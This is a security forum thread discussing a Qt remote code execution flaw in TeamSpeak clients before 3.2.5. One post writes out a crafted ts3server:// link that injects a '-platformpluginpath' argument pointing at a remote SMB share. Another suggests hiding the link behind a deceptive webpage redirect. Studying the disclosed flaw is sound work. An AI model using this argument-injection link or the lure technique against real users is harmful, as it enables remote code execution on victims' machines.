Remote Code Execution vulnerability in the Qt (Client < 3.2.5)

fyfywka

TeamSpeak Developer
Contributor
Joined
Sep 10, 2015
Messages
146
Reaction score
138
Points
118
Website
fyfywka.com

Bluscream

Retired Staff
Contributor
Joined
May 8, 2015
Messages
960
Reaction score
936
Points
171
Location
Germany
Website
r4p3.net

If it's that, you would need to trick the user to clicking something like [URL=ts3server://voice.teamspeak.com -platformpluginpath \\192.168.131.152\share]ts3server://voice.teamspeak.com[/URL]
 
Last edited:

DrWarpMan

Member
Joined
Jul 1, 2016
Messages
16
Reaction score
7
Points
41
Age
24
Was it any guy from r4p3 that found this?
 
Last edited:

Kieran

Tag me
Contributor
Joined
Jan 1, 2016
Messages
463
Reaction score
306
Points
122
Very interesting. So basically you tell QT 'Ye, to load your DDLs pls look for them in "\\x.x.x.x\explt" when you start up thx'?
That means you can even put that on a website and kind of obfuscating the exploit in TS by putting the custom ts3server uri handler as a meta refresh on a page like this [url=mynotinnocenthomepage.com/puppies.html]mynotinnocenthomepage.com/puppies.html[/url], right?
 

InVaDeR359

Active Member
Joined
May 29, 2017
Messages
160
Reaction score
124
Points
72
Location
Error 403
Website
127.0.0.1
Very interesting. So basically you tell QT 'Ye, to load your DDLs pls look for them in "\\x.x.x.x\explt" when you start up thx'?
That means you can even put that on a website and kind of obfuscating the exploit in TS by putting the custom ts3server uri handler as a meta refresh on a page like this [url=mynotinnocenthomepage.com/puppies.html]mynotinnocenthomepage.com/puppies.html[/url], right?
I think you mean [url=mynotinnocenthomepage.com/puppies.html]myinnocenthomepage.com/puppies.html[/url]
 

Kieran

Tag me
Contributor
Joined
Jan 1, 2016
Messages
463
Reaction score
306
Points
122
I think you mean [url=mynotinnocenthomepage.com/puppies.html]myinnocenthomepage.com/puppies.html[/url]
Also a possibility but that my spark suspicion, when someone copies the link instead of clicking right away when the displayed URL is different from the one that is linked
 

Asphyxia

Owner
Administrator
Joined
Apr 25, 2015
Messages
1,675
Reaction score
2,096
Points
287
Age
26
Location
North America
Was it any guy from r4p3 that found this?
No, any software development frameworks offer a lot of extensibility to developers so they can work with and around the operating system. With frameworks being so powerful, they have the potential to be abused and ultimately misused for malicious purposes by hackers. This issue was found regarding QT, not specifically TeamSpeak but thankfully they (TeamSpeak developers) are staying on top of security patches - probably because we have made them rightfully paranoid which is a GOOD thing. We have done our job, now we are safer.

With that said, there may be more security issues with many frameworks like QT (TeamSpeak uses this framework for their software).

One example can be found here: https://securiteam.com/unixfocus/5NP0O2KDPI/ or http://scary.beasts.org/security/CESA-2004-004.txt

I believe something similar to this was used when we developed the avatar crasher: https://r4p3.net/threads/teamspeak-3-avatar-crash-client-3-0-0-3-0-17.335/



If we found a way to utilize this vulnerability, we would have released a PoC (Proof of Concept) demonstrating how one could use this for educational purposes.

People like @Harrasan think everything in life comes free and no one has to work for anything, he is actually really close to being banned because you can find him complaining about everything and thinking proficient security researchers need $0 to run expensive servers and study for $8,000 reverse engineering classes for becoming a malware analyst and incident responder for the FBI/NSA/etc.

Update: A PoC is over here https://www.thezdi.com/blog/2019/4/3/loading-up-a-pair-of-qt-bugs-detailing-cve-2019-1636-and-cve-2019-6739



Looks very simple... a security mistake that is small with big issues possible.
 
Last edited:

tagKnife

Well-Known Member
Joined
Oct 2, 2015
Messages
343
Reaction score
270
Points
106
Age
30
Website
www.leakportal.com
Origin got hit by the same exploit.

AMD also uses QT, but looks like they don't have a URI registered, at least not on my system.
 
Last edited:

Top